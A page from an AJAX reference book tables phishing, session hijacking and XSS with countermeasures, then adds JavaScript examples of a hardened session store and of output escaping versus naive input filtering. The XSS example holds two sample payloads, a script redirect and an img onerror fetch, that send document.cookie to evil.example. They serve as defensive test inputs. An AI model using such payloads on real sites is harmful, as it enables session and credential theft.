AJAX - The Complete Reference


292 Part II: Developing an Ajax Library


Attack Name: Phishing / false login

Goal: To have a user inadvertently disclose their credentials.

How It Is Performed: Convince a user to visit an attacker-controlled or compromised site disguised to look like the login screen of the site under attack, and hope the user does not notice they are at the wrong site and enters their credentials.

Possible Countermeasures:
- Educate users.
- Provide a unique aspect of the site, customized to the user, that would be difficult to forge (for example an image or phrase the user chose at enrollment, shown before the password is requested). A phishing proxy that relays the real site can forward such a cue too, so it is a hint to the user rather than a guarantee.
- Modify the browser to show the location clearly or to flag a known phishing site.

Attack Name: Session hijacking

Goal: To copy the credentials of another user in order to assume or view their session or data.

How It Is Performed: With a network sniffer on a compromised network segment, the intruder may be able to view session data such as cookies and simply copy it. If session cookies, URLs, or hidden fields are predictable, the intruder may derive an upcoming value and wait until it is issued to a user. Finally, an intruder may get a user to divulge their cookie via a JavaScript exploit (see XSS), an intrusion on the client system, or social engineering.

Possible Countermeasures:
- Use SSL/TLS for transmission, and mark the session cookie Secure so the browser never sends it over plain HTTP.
- Make sure your sessionization system is strongly random: session identifiers must come from a cryptographic random source with enough entropy (128 bits is customary) that they can be neither guessed nor derived from previously observed values.
- Keep session lifetimes short and, if possible, bind session values to the browser or client IP address so a copied value cannot be replayed from elsewhere. Binding to the IP address breaks legitimately for users behind NAT pools or on mobile carriers whose address changes mid-session, so treat an address change as a signal to re-authenticate rather than as proof of attack.
- Avoid echoing sensitive information to the screen in case a session is compromised, and consider requiring a second form of authentication for sensitive actions.

Attack Name: XSS (Cross-site Scripting)

Goal: To get the user to execute code the intruder wrote under the user's own security context (the origin of the trusted site), often with the aim of stealing a cookie or performing a scripted action on the intruder's behalf.

How It Is Performed: The intruder is able to submit JavaScript code to a trusted server that the user will later download and run. The most common place XSS happens is on a message board or comment system where the intruder submits a script that a future reader will run when they view the page. Because JavaScript can read the cookies of its own origin, this is one method for an intruder to steal a user's credentials.

Possible Countermeasures:
- Input filtering is certainly part of dealing with XSS attacks, but output should also be escaped for the context in which it is rendered (HTML entities in element content and attribute values) so that submitted text is displayed as text rather than run as script. Filtering alone is brittle: stripping <script> tags, for example, still lets through an event-handler attribute on some other element.
- Avoid keeping credentials in cookies, or use HttpOnly cookies, which the browser withholds from document.cookie. HttpOnly stops an injected script from reading the cookie, but not from issuing requests that the browser attaches the cookie to, so the script can still act on the user's behalf within the session.

TABLE 7-3 Sampling of Attacks Focused on Gaining or Abusing User Credentials (continued)
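The session-hijacking countermeasures above, as an added example that is not code from the book: a minimal server-side session store that issues strongly random identifiers, expires them after a short lifetime, binds them to the issuing client, and emits the cookie with Secure and HttpOnly set. The function names, the 15-minute lifetime, the in-memory Map and the two constructed client requests are assumptions made for the example; a real deployment would persist sessions and bind to whatever client property fits its users.

```javascript
// Added example (not code from the book): a minimal session store that applies
// the countermeasures in the session-hijacking row. Function names, the
// 15-minute lifetime and the in-memory Map are assumptions.
const webcrypto = globalThis.crypto || require('crypto').webcrypto;

const SESSION_TTL_MS = 15 * 60 * 1000; // short session lifetime (assumed value)
const sessions = new Map();            // id -> { userId, expires, binding }

// The weak scheme the table warns about: a counter. Anyone who sees one value
// can derive the next one and wait for it to be handed to a victim.
let counter = 1000;
function predictableSessionId() {
  return String(counter++);
}

// The strong scheme: 128 bits from the platform CSPRNG, hex encoded, so an
// observed id tells an attacker nothing about past or future ids.
function newSessionId() {
  const bytes = new Uint8Array(16);
  webcrypto.getRandomValues(bytes);
  return Array.from(bytes, b => b.toString(16).padStart(2, '0')).join('');
}

// The client property the session is bound to. The User-Agent is used here
// because it is stable for one browser; binding to the client IP is also
// possible but breaks for users whose address changes mid-session.
function bindingFor(req) {
  return req.userAgent || '';
}

// Issue a session for an authenticated user. `now` is injectable for testing.
function createSession(userId, req, now = Date.now()) {
  const id = newSessionId();
  sessions.set(id, { userId, expires: now + SESSION_TTL_MS, binding: bindingFor(req) });
  return id;
}

// Cookie attributes: Secure keeps it off plain HTTP (where a sniffer could read
// it), HttpOnly keeps it away from document.cookie, Max-Age matches the server
// lifetime so a stale cookie is not presented indefinitely.
function sessionCookieHeader(id) {
  return `sid=${id}; Path=/; Secure; HttpOnly; SameSite=Lax; Max-Age=${SESSION_TTL_MS / 1000}`;
}

// Resolve a presented id to a user, or null if it is unknown, expired, or
// replayed from a client other than the one it was issued to.
function validateSession(id, req, now = Date.now()) {
  const s = sessions.get(id);
  if (!s) return null;
  if (now > s.expires) {
    sessions.delete(id);
    return null;
  }
  if (s.binding !== bindingFor(req)) return null;
  return s.userId;
}

// Demo: a sniffed cookie replayed from another client, and the same cookie
// presented after the lifetime has elapsed. Both requests are constructed.
function demo() {
  const victim = { userAgent: 'Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0' };
  const attacker = { userAgent: 'curl/8.0' };
  const t0 = 1_700_000_000_000;
  const sid = createSession('alice', victim, t0);
  return {
    cookie: sessionCookieHeader(sid),
    victimOk: validateSession(sid, victim, t0 + 1000),          // 'alice'
    replayFromAttacker: validateSession(sid, attacker, t0 + 1000), // null
    afterExpiry: validateSession(sid, victim, t0 + SESSION_TTL_MS + 1), // null
  };
}
console.log(demo());
```

Expiry is enforced server-side as well as through Max-Age, because the cookie's own expiry is advisory: an attacker who copied the value does not care what the browser was told.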
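The XSS countermeasure above, as an added example that is not code from the book: a stored comment rendered three ways (straight into markup, after a naive input filter, and with output escaping), with a rough static check standing in for the browser's parser to show which renderings still carry executable content. The comment strings, the evil.example host and all function names are constructed for the example; the HttpOnly cookie attribute that limits what a successful injection can read is shown in the session example's cookie header.

```javascript
// Added example (not code from the book): why output escaping, not input
// filtering, is what stops a stored comment from running as script. The
// comment strings, function names and the evil.example host are constructed.

// A naive input filter of the kind often seen on comment systems: it strips
// literal <script> tags and nothing else.
function naiveInputFilter(text) {
  return text.replace(/<\/?script\b[^>]*>/gi, '');
}

// Output escaping for HTML element content and double-quoted attributes: every
// character with markup meaning becomes an entity, so the browser renders it
// as text rather than parsing it as a tag or attribute.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, c => ENTITIES[c]);
}

// The vulnerable rendering the table describes: stored text concatenated
// straight into the page's markup.
function renderCommentVulnerable(comment) {
  return '<div class="comment">' + comment + '</div>';
}

// The hardened rendering: the same template, with the untrusted value escaped
// at the point it is written into HTML.
function renderCommentSafe(comment) {
  return '<div class="comment">' + escapeHtml(comment) + '</div>';
}

// A rough static check standing in for the browser's parser: does the markup
// contain a real <script> tag or an element with an event-handler attribute?
// Escaped text has no literal '<', so it never matches.
function containsActiveContent(html) {
  return /<script\b|<\w+[^>]*\son\w+\s*=/i.test(html);
}

// Constructed sample comments as an attacker would submit them. The two
// payloads each try to send the reader's cookie to an attacker-controlled host.
const COMMENTS = [
  'Nice write-up, thanks.',
  '<script>location="https://evil.example/?c="+document.cookie</script>',
  '<img src=x onerror="fetch(\'https://evil.example/?c=\'+document.cookie)">',
];

// Render each comment three ways and report which renderings still carry
// executable content (true means the payload would run).
function compareRenderings(comments = COMMENTS) {
  return comments.map(c => ({
    comment: c,
    unfiltered: containsActiveContent(renderCommentVulnerable(c)),
    inputFiltered: containsActiveContent(renderCommentVulnerable(naiveInputFilter(c))),
    outputEscaped: containsActiveContent(renderCommentSafe(c)),
  }));
}
console.table(compareRenderings());
```

The second payload is the one to watch: the input filter removes the `<script>` tag from the first payload but passes the `<img onerror>` form through untouched, while output escaping neutralizes both without needing to know which tags an attacker might use.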